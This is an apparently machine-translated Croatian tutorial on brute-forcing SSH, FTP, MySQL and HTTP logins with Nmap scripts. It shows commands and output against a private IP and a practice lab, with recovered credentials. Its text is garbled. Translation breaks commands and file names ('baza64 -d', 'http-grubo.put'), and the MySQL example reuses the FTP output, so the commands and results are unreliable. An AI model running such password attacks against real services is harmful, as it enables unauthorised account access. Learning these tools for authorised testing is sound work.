Nmap

Forsiranje grube lozinke pomoću Nmapa

Forsiranje grube lozinke pomoću Nmapa
Za brutalnu internetsku uslugu ljudi obično koriste Hydra, Medusu i Metasploit Framework, ali Nmap se također može koristiti za grubu silu mnogih internetskih usluga. Postoje ugrađene Nmap skripte koje podržavaju FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP i druge razne usluge. Također možete grubom prisiliti HTTP-utemeljene, osnovne i probavne metode provjere autentičnosti. Ako imate instaliran Nmap, ove skripte možete vidjeti u direktoriju “/ usr / share / nmap / scripts”.

[zaštićena e-poštom]: ~ $ sudo apt update && sudo apt nadogradnja
[zaštićena e-poštom]: ~ $ sudo apt install nmap -y
[e-pošta zaštićena]: ~ $ cd / usr / share / nmap / scripts /
[zaštićena e-poštom]: ~ $ ls * brute *

U ovom uputstvu istražit ćemo kako možemo koristiti Nmap za grubi napad.

SSH Brute Force

SSH je siguran protokol za daljinsku administraciju i podržava autentifikaciju na temelju openssl-a i lozinke. Za grubu prisilnu provjeru autentičnosti zasnovanu na SSH lozinci možemo koristiti “ssh-brute.nse ”Nmap skripta.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ssh * brute *
ssh-grubo.nse

Proslijedite popis korisničkih imena i lozinki kao argument Nmap-u.

[zaštićena e-poštom]: ~ $ nmap --script ssh-brute -p22 192.168.43.181
--script-args userdb = korisnici.txt, passdb = lozinke.txt
Pokretanje Nmap 7.70 (https: // nmap.org) u 2020-02-08 17:09 PKT
Izvješće o skeniranju Nmap za 192.168.43.181
Domaćin je gore (0.Latencija 00033s).
LUČKA DRŽAVNA USLUGA
22 / tcp otvoreno ssh
| ssh-brute:
| Računi:
| admin: p4ssw0rd - valjane vjerodajnice
| _ Statistika: Izvedeno 99 nagađanja u 60 sekundi, prosječni tps: 1.7
Nmap gotovo: 1 IP adresa (1 host up) skenirana u 60.17 sekundi

FTP gruba sila

FTP je protokol za prijenos datoteka koji podržava provjeru autentičnosti na temelju lozinke. Za grubu silu FTP-a koristit ćemo "ftp-brute.nse ”Nmap skripta.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ftp * brute *
ftp-brute.nse

Proslijedite popis korisničkih imena i lozinki kao argument Nmap-u.

[e-pošta zaštićena]: ~ $ nmap --script ftp-brute -p21 192.168.43.181 --script-args
userdb = korisnici.txt, passdb = lozinke.txt
Pokretanje Nmap 7.70 (https: // nmap.org) u 2020-02-08 16:51 PKT
Izvješće o skeniranju Nmap za 192.168.43.181
Domaćin je gore (0.Latencija 00021s).
LUČKA DRŽAVNA USLUGA
21 / tcp otvoreni ftp
| ftp-brute:
| Računi:
| admin: p4ssw0rd - valjane vjerodajnice
| _ Statistika: Izvedeno 99 nagađanja u 20 sekundi, prosječni tps: 5.0
Nmap gotovo: 1 IP adresa (1 host up) skenirana u 19.50 sekundi

MYSQL gruba sila

Ponekad MySQL ostaje otvoren za vanjske veze i omogućuje bilo kome da se na njega poveže. Njegova se lozinka može provaliti pomoću Nmapa s skriptom "mysql-brute".

[e-pošta zaštićena]: ~ $ sudo nmap --script mysql-brute -p3306 192.168.43.181
--script-args userdb = korisnici.txt, passdb = lozinke.txt
Pokretanje Nmap 7.70 (https: // nmap.org) u 2020-02-08 16:51 PKT
Izvješće o skeniranju Nmap za 192.168.43.181
Domaćin je gore (0.Latencija 00021s).
LUČKA DRŽAVNA USLUGA
3306 / tcp otvoreni mysql
| ftp-brute:
| Računi:
| admin: p4ssw0rd - valjane vjerodajnice
| _ Statistika: Izvedeno 99 nagađanja u 20 sekundi, prosječni tps: 5.0
Nmap gotovo: 1 IP adresa (1 host up) skenirana u 19.40 sekundi

HTTP gruba sila

HTTP koristi tri vrste autentifikacije za autentifikaciju korisnika na web poslužiteljima. Te se metodologije koriste u usmjerivačima, modemima i naprednim web aplikacijama za razmjenu korisničkih imena i lozinki. To su sljedeće vrste:

Osnovna autentifikacija

U HTTP osnovnom protokolu provjere autentičnosti preglednik kodira korisničko ime i lozinku s base64 i šalje ih pod zaglavljem “Autorizacija”. To možete vidjeti na sljedećem snimku zaslona.

Odobrenje: Osnovni YWRtaW46YWRtaW4 =

Možete base64 dekodirati ovaj niz da biste vidjeli korisničko ime i lozinku

[e-pošta zaštićena]: ~ $ echo YWRtaW46YWRtaW4 = | baza64 -d
admin: admin

Osnovna HTTP provjera autentičnosti nije sigurna jer šalje korisničko ime i lozinku u običnom tekstu. Bilo koji napadač Man-in-the-Middle može jednostavno presresti promet i dekodirati niz da bi dobio lozinku.

Provjera autentičnosti

HTTP Digest provjera autentičnosti koristi tehnike raspršivanja za šifriranje korisničkog imena i lozinke prije slanja na poslužitelj.

Hash1 = MD5 (korisničko ime: područje: lozinka)
Hash2 = MD5 (metoda: digestURI)
odgovor = MD5 (Hash1: nonce: nonceCount: cnonce: qop: Hash2)

Te vrijednosti možete vidjeti pod zaglavljem "Ovlaštenje".

Autentifikacija na temelju digesta sigurna je jer se lozinka ne šalje u običnom tekstu. Ako Man-in-the-Middle napadač presretne promet, neće moći dobiti lozinku za običan tekst.

Autentifikacija na temelju obrasca

Osnovna i Digest provjera autentičnosti podržavaju samo prijenos korisničkog imena i lozinke, dok se provjera temeljena na obrascu može prilagoditi prema potrebama korisnika. Možete izraditi vlastitu web stranicu u HTML-u ili JavaScript-u da biste primijenili vlastite tehnike kodiranja i prijenosa.

Obično se podaci u provjeri autentičnosti na temelju obrasca šalju u običnom tekstu. Zbog sigurnosnih problema moraju se primijeniti HTTP-ovi kako bi se spriječili napadi "Čovjek u sredini".

Pomoću Nmap-a možemo grubo primijeniti sve vrste HTTP provjere autentičnosti. U tu svrhu upotrijebit ćemo skriptu "http-brute".

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * http * brute *
http-grubo.nse

Da bismo testirali ovu Nmap skriptu, na ovom ćemo URL-u riješiti izazov brute sile koji je javno organizirala akademija pentester http: // pentesteracademylab.appspot.com / lab / webapp / basicauth.

Kao argument skripte moramo odvojeno navesti sve, uključujući ime hosta, URI, metodu zahtjeva i rječnike.

[zaštićena e-poštom]: ~ $ sudo nmap -p80 --script http-brute pentesteracademylab.appspot.com
--script-args http-brute.ime hosta = pentesteracademylab.appspot.com,
http-grubo.put = / lab / webapp / basicauth, userdb = korisnici.txt, passdb = lozinke.txt,
http-grubo.metoda = POST
 
Pokretanje Nmap 7.70 (https: // nmap.org) u 2020-02-08 21:37 PKT
Izvješće o skeniranju Nmap za pentesteracademylab.appspot.com (216.58.210.84)
Domaćin je gore (0.Latencija 20-ih).
Ostale adrese za pentesteracademylab.appspot.com (nije skenirano): 2a00: 1450: 4018: 803 :: 2014
rDNS zapis za 216.58.210.84: mct01s06-u-f84.1e100.neto
 
LUČKA DRŽAVNA USLUGA
80 / tcp otvori http
| http-brute:
| Računi:
| admin: aaddd - valjane vjerodajnice
| _ Statistika: Izvedeno 165 nagađanja u 29 sekundi, prosječni tps: 5.3
Nmap gotovo: 1 IP adresa (1 host up) skenirana u 31.22 sekunde

Zaključak

Nmap se može koristiti za puno stvari, unatoč jednostavnom skeniranju priključaka. Može zamijeniti Metasploit, Hydra, Meduzu i puno drugih alata stvorenih posebno za internetsko forsiranje bruta. Nmap ima jednostavne, jednostavne ugrađene skripte koje grubo forsiraju gotovo sve usluge, uključujući HTTP, TELNEL, SSH, MySQL, Sambu i druge.

Vodič za bitku za Wesnoth
Bitka za Wesnoth jedna je od najpopularnijih strateških igara otvorenog koda koje trenutno možete igrati. Ne samo da se ova igra razvija već jako dugo...
0 A.D. Vodič
Od mnogih strateških igara tamo, 0 A.D. uspijeva se istaknuti kao sveobuhvatan naslov i vrlo duboka, taktička igra unatoč tome što je otvoren izvor. R...
Vodič za Unity3D
Uvod u Unity 3D Unity 3D moćan je motor za razvoj igara. Cross platforma je to što vam omogućuje stvaranje igara za mobilne uređaje, web, stolne račun...